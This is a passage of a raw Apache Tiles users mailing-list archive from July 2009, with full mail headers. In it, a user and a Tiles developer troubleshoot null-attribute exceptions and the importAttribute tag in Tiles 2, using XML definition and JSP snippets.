Jul 2009 09:51:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19222 invoked by uid 99); 10 Jul 2009 09:51:52 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:51:52 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:51:43 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MPClG-0008U6-PI for [email protected]; Fri, 10 Jul 2009 02:51:22 -0700 Message-ID: <[email protected]> Date: Fri, 10 Jul 2009 02:51:22 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Re: Issue with putAttribute tag In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org But in both casestiles1 and tiles2 header value has null value. In case of tiles1 it does not throw any exception when this value is null. Whereas exception occurs in case of tiles2. I'm confused. Antonio Petrelli-3 wrote: >=20 > 2009/7/10 Roshni Basu <[email protected]>: >> =C2=A0<tiles:put name=3D"header" beanName=3D"header" beanScope=3D"tile"/= > >=20 > I am sorry but in Tiles 2 there is no way to access this "tile" scope. > You have to import the attribute through <tiles:importAttribute> >=20 > Antonio >=20 >=20 --=20 View this message in context: http://www.nabble.com/Issue-with-putAttribute= -tag-tp24353360p24424574.html Sent from the tiles users mailing list [email protected]. From [email protected] Fri Jul 10 09:59:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41286 invoked from network); 10 Jul 2009 09:59:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jul 2009 09:59:22 -0000 Received: (qmail 31251 invoked by uid 500); 10 Jul 2009 09:59:32 -0000 Delivered-To: [email protected] Received: (qmail 31229 invoked by uid 500); 10 Jul 2009 09:59:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31219 invoked by uid 99); 10 Jul 2009 09:59:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:59:32 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Jul 2009 09:59:23 +0000 Received: by bwz7 with SMTP id 7so722329bwz.8 for <[email protected]>; Fri, 10 Jul 2009 02:59:03 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=Ggtm3peovu1OHUj5Fh76CONAHXyP2wnvFJ6HdezlCwI=; b=JYxp7HBCrD/cR7/zVqkaCX/EHuOM18WGV7OA5SnG6k9Lo6lTYUQhg7CEBhAQOwZapQ ND7/y8LSl7oCnfRAtOY+zEmDVJNeLyJFx1MYyPmO7Fy6lgtz4z/tt5tW1zpEzTRhGCov wTVdnZd35xDZVLvJP63zI+HfRmqmbQvnA5AGE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=J9c8h6aLlyXf6chraRNCNl/kR5Ugb5Yxm6P8cMMPGKyX+CBVuh2lc2buDrNVExgd9V 5jVL1eqWvKVz6avNXZLap2/+U5lLN19L6zC1PvgtBBSTl+iRV1tXiDsu6B5xmqDQ9GHB Fjl1jnxI8dQlLhnax+saZ5WYzPDhfRuMCxgtg= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id r7mr849235fao.8.1247219942837; Fri, 10 Jul 2009 02:59:02 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Fri, 10 Jul 2009 11:59:02 +0200 Message-ID: <[email protected]> Subject: Re: Issue with putAttribute tag From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/10 Roshni Basu <[email protected]>: > > But in both casestiles1 and tiles2 header value has null value. > In case of tiles1 it does not throw any exception when this value is null. > Whereas exception occurs in case of tiles2. > I'm confused. If you don't want to throw exceptions, use the ignore="true" in the <tiles:insertAttribute> tag. Anyway notice that the NPE is useful to track bugs on your side, so use it paying attention. Antonio From [email protected] Thu Jul 16 05:43:36 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50257 invoked from network); 16 Jul 2009 05:43:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 05:43:36 -0000 Received: (qmail 81488 invoked by uid 500); 16 Jul 2009 05:44:42 -0000 Delivered-To: [email protected] Received: (qmail 81406 invoked by uid 500); 16 Jul 2009 05:44:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81396 invoked by uid 99); 16 Jul 2009 05:44:42 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 05:44:42 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 05:44:32 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MRJlM-0002lv-3h for [email protected]; Wed, 15 Jul 2009 22:44:12 -0700 Message-ID: <[email protected]> Date: Wed, 15 Jul 2009 22:44:12 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: How to use import attribute? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] X-Virus-Checked: Checked by ClamAV on apache.org Hi, I'm using <put-attribute name="enableID" value="true" /> in my tile-definition.xml. In my jsp I'm using , <tiles:importAttribute name="enableID" /> It throws exception saying attribute enableID not found. If i do not use <tiles:importAttribute name="enableID" />, the jsp is rendered properly. Here is my snippet of web.xml <servlet> <servlet-name>tiles</servlet-name> <servlet-class>org.apache.tiles.web.startup.TilesServlet</servlet-class> <init-param> <param-name> org.apache.tiles.impl.BasicTilesContainer.DEFINITIONS_CONFIG</param-name> <param-value>/WEB-INF/layout/tile-definition.xml</param-value> </init-param> </servlet> -- View this message in context: http://www.nabble.com/How-to-use-import-attribute--tp24510460p24510460.html Sent from the tiles users mailing list [email protected]. From [email protected] Thu Jul 16 05:55:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55258 invoked from network); 16 Jul 2009 05:55:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 05:55:28 -0000 Received: (qmail 87894 invoked by uid 500); 16 Jul 2009 05:56:33 -0000 Delivered-To: [email protected] Received: (qmail 87852 invoked by uid 500); 16 Jul 2009 05:56:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87842 invoked by uid 99); 16 Jul 2009 05:56:33 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 05:56:33 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 05:56:22 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MRJwn-00039k-L4 for [email protected]; Wed, 15 Jul 2009 22:56:01 -0700 Message-ID: <[email protected]> Date: Wed, 15 Jul 2009 22:56:01 -0700 (PDT) From: Roshni Basu <[email protected]> To: [email protected] Subject: Re: Issue with putAttribute tag In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Hi, Actually I'm wondering how does it work for Tiles1 when 'header' has a null value.It renders the page properly. Whereas in case of tiles2 it throws exception. And it is not null pointer exception.The jsp page is not rendered. Caused by: javax.servlet.ServletException: Error importing attributes. Attribute 'header' has a null value. Antonio Petrelli-3 wrote: > > 2009/7/10 Roshni Basu <[email protected]>: >> >> But in both casestiles1 and tiles2 header value has null value. >> In case of tiles1 it does not throw any exception when this value is >> null. >> Whereas exception occurs in case of tiles2. >> I'm confused. > > If you don't want to throw exceptions, use the ignore="true" in the > <tiles:insertAttribute> tag. > Anyway notice that the NPE is useful to track bugs on your side, so > use it paying attention. > > Antonio > > -- View this message in context: http://www.nabble.com/Issue-with-putAttribute-tag-tp24353360p24510545.html Sent from the tiles users mailing list [email protected]. From [email protected] Thu Jul 16 07:15:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90850 invoked from network); 16 Jul 2009 07:15:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 07:15:29 -0000 Received: (qmail 65881 invoked by uid 500); 16 Jul 2009 07:16:35 -0000 Delivered-To: [email protected] Received: (qmail 65836 invoked by uid 500); 16 Jul 2009 07:16:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65822 invoked by uid 99); 16 Jul 2009 07:16:33 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 07:16:33 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 07:16:25 +0000 Received: by bwz7 with SMTP id 7so3847157bwz.8 for <[email protected]>; Thu, 16 Jul 2009 00:16:03 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=kYW4ldB3Xka6TZKtyIPi2Kf7nIb1qpRjJjOE4Z/oEl8=; b=QaxBtW0IUPRzVGII9ma+1yncWCRH0CJMDvW7/A9HKSOB+OkRw1REy6E7n5kHqCWBi3 z0S4OWWugZXW6DWv3vY6o3FoA3OJm9hSXMx+vF4BJbAZEQ0vDO8pOWcYTBiomRsrYqnf tqHS24NoKxMXVVJXJUFzDDn6a1TCyTeme5CrM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=DgctOC+uU/9U10Hbwo6wa4I73tOhi7W6xia0T2QDypCQrXkHOI4BTEe0icd+FQZURZ VoEsxHO//HkNFjgxAAxgtQmGgu/mI+Y43BuneCg9Y0CcJB5n5mfkAPNzkuX2JOzCigxi i3mWSG+RPRfiarkzNKt/wfBndLnj+0nzZJvVY= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id o14mr4405475faq.21.1247728563687; Thu, 16 Jul 2009 00:16:03 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Thu, 16 Jul 2009 09:16:03 +0200 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > > Hi, > > I'm using =A0 <put-attribute name=3D"enableID" value=3D"true" /> in my > tile-definition.xml. > In my jsp I'm using , > <tiles:importAttribute name=3D"enableID" /> Can I see how your definition is done and the JSP pages? Antonio From [email protected] Thu Jul 16 07:37:41 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96320 invoked from network); 16 Jul 2009 07:37:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 07:37:41 -0000 Received: (qmail 89855 invoked by uid 500); 16 Jul 2009 07:38:47 -0000 Delivered-To: [email protected] Received: (qmail 89779 invoked by uid 500); 16 Jul 2009 07:38:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89769 invoked by uid 99); 16 Jul 2009 07:38:46 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 07:38:46 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 07:38:38 +0000 Received: by bwz7 with SMTP id 7so3855770bwz.8 for <[email protected]>; Thu, 16 Jul 2009 00:38:17 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=+tz+w8zzVcyiROH/nWrcPci1chwKyl1hsxqxEPaIqP4=; b=RjV8k5uRYrHfo51mI5S+NEpM1fw5blA8SP4Ztzs76vPgIXdmJluv40lv1ieTJlR68U u/u7kyKBpiwozdGukKAvw/mXOghqYsES7oTbjcH8WQgbuzzvermgLXiVeQCfG/dBOAsD h53os06s8Be+oTvwlzeVgGjDXivXBqhjSEkzU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=C+UbrXIKYN4ITw9BWAHDs/sTWflsF9T54rfyD/JA+BD4C/jXgU6f2UMkjWQepJ6IKZ Z16qLIe9nnICEjfflKoObgIcONTJKElW6B6Ykm25+Hh6eLSPbIz6NoWTLHEi2jJaAa4v M7RmtOjzsikf/EYnFpiBB2fS2kmjgy0WIbVY0= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k5mr597511hbk.111.1247729894933; Thu, 16 Jul 2009 00:38:14 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 13:08:14 +0530 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f4241229c71e046ecdc1d0 X-Virus-Checked: Checked by ClamAV on apache.org --001485f4241229c71e046ecdc1d0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit <?xml version="1.0" encoding="ISO-8859-1" ?> <!DOCTYPE tiles-definitions PUBLIC "-//Apache Software Foundation//DTD Tiles Configuration 2.1//EN" "http://tiles.apache.org/dtds/tiles-config_2_1.dtd"> <!-- Definitions for Tiles documentation --> <tiles-definitions> <definition name="main.top" template="/framework/Template.jsp"> <put-attribute name="header" value="/view/common/header.jsp"/> <put-attribute name="enableID" value="true"/> </definition> </tiles-definitions> snippet from Jsp file: <tiles2:insertDefinition name="main.top"> <tiles2:importAttribute name="enableID" /> <c:out value="${enableID}"></c:out> </tiles2:insertDefinition> On Thu, Jul 16, 2009 at 12:46 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/16 Roshni Basu <[email protected]>: > > > > Hi, > > > > I'm using <put-attribute name="enableID" value="true" /> in my > > tile-definition.xml. > > In my jsp I'm using , > > <tiles:importAttribute name="enableID" /> > > Can I see how your definition is done and the JSP pages? > > Antonio > --001485f4241229c71e046ecdc1d0-- From [email protected] Thu Jul 16 07:44:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97945 invoked from network); 16 Jul 2009 07:44:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 07:44:27 -0000 Received: (qmail 95935 invoked by uid 500); 16 Jul 2009 07:45:33 -0000 Delivered-To: [email protected] Received: (qmail 95876 invoked by uid 500); 16 Jul 2009 07:45:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95861 invoked by uid 99); 16 Jul 2009 07:45:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 07:45:32 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f211.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 07:45:23 +0000 Received: by bwz7 with SMTP id 7so3858533bwz.8 for <[email protected]>; Thu, 16 Jul 2009 00:45:03 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=y/XyVhH/UNPiG5WAo+0YkPYxKf4uf/Ij5wIWEW/+iAg=; b=sEQWdWsYwADLIGVpqB5gXwykDhTh6MN7J2BZDYqcGzorJRfBW2UzmGYCyWNOoyMwmZ bU/3KjSWDAcVKdkXSzjDMqpCPC4s3+oUC0zNk+oqdJE93hM1gERdYmG6SEu2LKiCBQib lLeg17y7Zck0fZgxT3zWyLhijOb6Js46rzjks= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=RUbC2Vw6zqksvjCPDDeOl+I7m8pW0r7bTXyZsKESznokQV/Uk1qx9evfuurGYcou3L n2+q8iP7VKte1NSGEAcIRTgUWzEjffz9KsjBoaKoOrPZ8dG2cwQeeW8t8+E+LC1RCb2a glxLAxtBFRB+srUCRKI8hHBG/sD2eOLzzqnm8= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id e18mr8435744bkg.69.1247730302630; Thu, 16 Jul 2009 00:45:02 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 09:45:02 +0200 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Antonio Petrelli <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org 2009/7/16 Roshni Basu <[email protected]>: > snippet from Jsp file: > > <tiles2:insertDefinition =A0name=3D"main.top"> > <tiles2:importAttribute name=3D"enableID" /> > <c:out value=3D"${enableID}"></c:out> > > > > </tiles2:insertDefinition> Is this Template.jsp? Antonio From [email protected] Thu Jul 16 08:10:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3696 invoked from network); 16 Jul 2009 08:10:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:10:32 -0000 Received: (qmail 19892 invoked by uid 500); 16 Jul 2009 08:11:37 -0000 Delivered-To: [email protected] Received: (qmail 19829 invoked by uid 500); 16 Jul 2009 08:11:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 19819 invoked by uid 99); 16 Jul 2009 08:11:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:11:36 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:11:28 +0000 Received: by fxm22 with SMTP id 22so3853174fxm.8 for <[email protected]>; Thu, 16 Jul 2009 01:11:07 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=NwLLpDaETfAKq4nDZcNzsJc7UNMH07QezA8zTMQU9XQ=; b=PXrlCxExnprBjr5McYy0e900qz9Jsdklf4IS5UlDgomhC1pnJPRNWmMGsVgsfQI5q/ vGouDNhbPp7GST+pZaBPTp9clrMoFJET0AbWIr9rp/S6gvawytOCafOM6m32e9ULekCN 6T7upekb+DBmNlQy376B0z9NDYEoxmlkDOzsk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=FAHbm5jOine8UxFGv3OYX2S7JCf4ymipyvVGyuREFFYU2fNRBMG3H8xX9oXebQPT6i tlyjEF0Z0OvvZQcqhTOKhKsIQrnXtvZxARVMZ9Zy3fJyjZxpyFelCY1vos+dXRuB3teA F0TSOUTeLG8wuR/2J17DrRLhQS9Ed3g5dnGKw= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id b10mr641854hba.84.1247731867359; Thu, 16 Jul 2009 01:11:07 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 13:41:07 +0530 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f27210ba9962046ece36e1 X-Virus-Checked: Checked by ClamAV on apache.org --001485f27210ba9962046ece36e1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit No . On Thu, Jul 16, 2009 at 1:15 PM, Antonio Petrelli < [email protected]> wrote: > 2009/7/16 Roshni Basu <[email protected]>: > > snippet from Jsp file: > > > > <tiles2:insertDefinition name="main.top"> > > <tiles2:importAttribute name="enableID" /> > > <c:out value="${enableID}"></c:out> > > > > > > > > </tiles2:insertDefinition> > > Is this Template.jsp? > > Antonio > --001485f27210ba9962046ece36e1-- From [email protected] Thu Jul 16 08:12:46 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4096 invoked from network); 16 Jul 2009 08:12:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:12:46 -0000 Received: (qmail 23829 invoked by uid 500); 16 Jul 2009 08:13:51 -0000 Delivered-To: [email protected] Received: (qmail 23781 invoked by uid 500); 16 Jul 2009 08:13:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <users.tiles.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23771 invoked by uid 99); 16 Jul 2009 08:13:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:13:51 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f222.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 08:13:42 +0000 Received: by fxm22 with SMTP id 22so3854144fxm.8 for <[email protected]>; Thu, 16 Jul 2009 01:13:21 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=eX5xHFPstceq5fHrcIYdTGfNKQpJgqUsiBtqxC5+Lqo=; b=JxDnMq8dqgWBla++IHhU/uc7zeMvBRZglT2d4Kdm3pXCOiSPcwk5Z0JDmZiQFObpAa Y1rE27UP66PIc90B5E+PRvd/MpCtedTSfWFsKuYDCE+dX9lQcq0gx+ymdkgyo5lflDtZ yD/zTSoqvDe+f+12f6ptcrccAljmfZgUuehg0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=KM49cZiIRFce1Kth3O9sfOff43MDaB22KJ3q6nnS5koMbJUb6MVVAHFftSanOxp+ea LZWsCVTJ4kT++hd58s+V+UdttEwzl9ibnqgChDlKEZArlrXeuJBA73MluqHwQxxLdY// 12jyf+IEx0bFHeMv1EBal1eXS9M4W61GlxGmw= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id k5mr599534hbk.111.1247732001477; Thu, 16 Jul 2009 01:13:21 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 16 Jul 2009 13:43:21 +0530 Message-ID: <[email protected]> Subject: Re: How to use import attribute? From: Roshni Basu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001485f42412b91961046ece3ee4 X-Virus-Checked: Checked by ClamAV on apache.org --001485f42412b91961046ece3ee4 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit But yes I may need the same thing in Template.jsp also. On Thu, Jul 16, 2009 at 1:41 PM, Roshni Basu <[email protected]> wrote: > No . > > > On Thu, Jul 16, 2009 at 1:15 PM, Antonio Petrelli < > [email protected]> wrote: > >> 2009/7/16 Roshni Basu <[email protected]>: >> > snippet from Jsp file: >> > >> > <tiles2:insertDefinition name="main.top"> >> > <tiles2:importAttribute name="enableID" /> >> > <c:out value="${enableID}"></c:out> >> > >> > >> > >> > </tiles2:insertDefinition> >> >> Is this Template.jsp? >> >> Antonio >> > > --001485f42412b91961046ece3ee4-- From [email protected] Thu Jul 16 08:12:56 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4129 invoked from network); 16 Jul 2009 08:12:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 08:12:56 -0000 Received: (qmail 23992 invoked by uid 500); 16 Jul 2009 08:14:01 -0000 Delivered-To: [email protected] Received: (qmail 23963 invoked by uid 500); 16 Jul 2009 